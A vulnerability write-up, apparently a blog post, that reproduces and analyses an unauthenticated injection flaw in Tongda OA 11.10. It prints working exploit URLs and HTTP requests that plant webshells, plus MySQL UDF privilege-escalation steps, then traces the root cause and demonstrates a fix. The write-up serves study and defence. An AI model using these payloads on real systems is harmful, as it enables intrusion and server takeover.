Tongda OA 11.10 unauthenticated arbitrary file upload

Vulnerability overview

I have done more detailed analysis and vulnerability hunting on Tongda OA before. A few days ago I saw that Tongda OA 11.10 has an unauthenticated file upload vulnerability, so I decided to reproduce and analyze it as well.

Environment setup

Download page: https://www.tongda2000.com/download/p2019.php

Installer: https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe

After installation, check the version information to confirm that the target is 11.10.

Vulnerability reproduction

Exploitation method one

Inject PHP directly through the activeTab parameter of the unauthenticated getdata endpoint. The injected eval() executes whatever is sent in the POST parameter c:

http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage

Exploitation method two

A webshell that contains a variable such as $_POST[c] cannot be written directly: single quotes in the input are escaped, so the file content in the injected fwrite() call has to be a double-quoted PHP string, and PHP interpolates $variables inside double-quoted strings.

So first write a parameterless webshell that takes its code from the request headers:

<?php @eval(next(getallheaders()));

Note that next(getallheaders()) evaluates the value of the second header of the request, so the PHP code has to be sent in whichever header arrives second.
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1
Host: 192.168.222.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Once the file has been written, use this first webshell to write a second one that takes a parameter (adjust the host and file name to match the file written in the previous step; in this capture the first webshell is /general/test.php):

GET /general/test.php HTTP/1.1
Host: 192.168.121.147:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: file_put_contents('test1.php','<?php @eval($_REQUEST[1]);');
Content-Length: 28

Upgrade-Insecure-Requests: 1

However, commands cannot be executed directly from the webshell, because the account the web server runs as has too few privileges. Further operations therefore require privilege escalation.

Read the MySQL password from the configuration file:

Use AntSword to connect to the database:

Check the MySQL version, which decides where the privilege-escalation DLL has to be placed:

MySQL version    Location of the privilege-escalation DLL
5.1 and later    lib/plugin/ under the MySQL base directory (select @@basedir; select @@plugin_dir returns the exact directory)
before 5.1       the system directory, c:\windows\system32

The UDF library used for privilege escalation is bundled with sqlmap, but it is stored in an encoded form and must be decoded first.

The decoding script, cloak.py, lives under:

sqlmap-master\extra\cloak

The encoded DLL (lib_mysqludf_sys.dll_) is under:

sqlmap-master\data\udf\mysql\windows\64

Decode it:

cloak.py -d -i sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

Then upload the decoded lib_mysqludf_sys.dll into mysql/lib/plugin/ (the plugin directory determined above) and register the function:
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
select sys_eval("whoami");

The DLL must match the architecture of the MySQL server process (the 64-bit build is taken from the windows\64 directory above); otherwise CREATE FUNCTION fails to load it.

Vulnerability analysis

general\appbuilder\modules\portal\controllers\GatewayController.php#actionGetdata


actionGetdata first checks whether the id parameter is present, then calls GetData and toUTF8 in turn, with the code path selected by the value of module.

general\appbuilder\modules\portal\models\PortalComponent.php#GetData


GetData queries the record by id and returns the corresponding value. The value of $activeTab comes straight from the request, so it is attacker-controlled.

Depending on $module, a different get_data method is called.

general\appbuilder\modules\portal\components\AppDesignComponents.php#data_analysis


general\appbuilder\modules\appdesign\models\AppUtils.php#toUTF8


This works much like wide-byte injection. The single quote in the incoming activeTab value is first escaped with a backslash (0x5C). toUTF8 then converts the value, and the preceding %E5 byte together with that 0x5C byte is interpreted as one two-byte Chinese character. The backslash disappears into the character, the single quote is left unescaped and closes the string, and the remainder of the value is executed as PHP code.
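The escape-then-convert mistake described above, as an added example that is not Tongda OA's own code: it assumes that toUTF8 behaves like a GBK to UTF-8 conversion applied after the single quote has been escaped, and uses the urldecoded form of the %E5%27 prefix from the requests above as a constructed payload. The hardened variant decodes first and escapes second, so a stray lead byte is rejected instead of swallowing the backslash.

```python
from typing import Optional

# Added example (not Tongda OA's source). ASSUMPTION: toUTF8 behaves like a
# GBK -> UTF-8 conversion that runs *after* the single quote has been escaped.


def addslashes(data: bytes) -> bytes:
    """Byte-wise imitation of PHP addslashes(): prefix ' " \\ and NUL with 0x5C."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def vulnerable_pipeline(raw: bytes) -> str:
    """Escape first, convert second (the order the analysis describes).

    In GBK any byte 0x81-0xFE starts a two-byte character and 0x5C is a valid
    second byte, so the inserted backslash is absorbed into the character and
    the quote that follows it is no longer escaped.
    """
    return addslashes(raw).decode("gbk")


def hardened_pipeline(raw: bytes) -> Optional[str]:
    """Convert first, escape second.

    Strict decoding rejects a lone lead byte instead of repairing it, and
    escaping the decoded text afterwards means the backslash is always its own
    character. Returns None when the input is not valid GBK.
    """
    try:
        text = raw.decode("gbk")
    except UnicodeDecodeError:
        return None
    return (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"'))


def has_unescaped_quote(value: str) -> bool:
    """True if a single quote is present that is not preceded by a backslash."""
    return any(ch == "'" and (i == 0 or value[i - 1] != "\\")
               for i, ch in enumerate(value))


# Constructed inputs (urldecoded, as the application would see them).
PAYLOAD = b"\xe5',1=>eval($_POST[c]));/*"   # %E5%27,1=>eval(...));/*
BENIGN = "中文".encode("gbk")                 # two well-formed GBK characters
TRAILING_5C = b"\xe5\\"                     # a GBK character whose 2nd byte is 0x5C

if __name__ == "__main__":
    v = vulnerable_pipeline(PAYLOAD)
    print("vulnerable :", repr(v), "quote free?", has_unescaped_quote(v))
    print("hardened   :", repr(hardened_pipeline(PAYLOAD)))
    print("benign     :", repr(vulnerable_pipeline(BENIGN)),
          repr(hardened_pipeline(BENIGN)))
    print("0x5C trail :", repr(vulnerable_pipeline(TRAILING_5C)),
          repr(hardened_pipeline(TRAILING_5C)))
```

The TRAILING_5C case shows the other side of the same bug: a legitimate character whose second byte is 0x5C gets an extra backslash appended by the escape-first pipeline, which then escapes whatever closing quote follows it. Decoding before escaping leaves that character intact.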


Origin blog.csdn.net/qq_38154820/article/details/131016396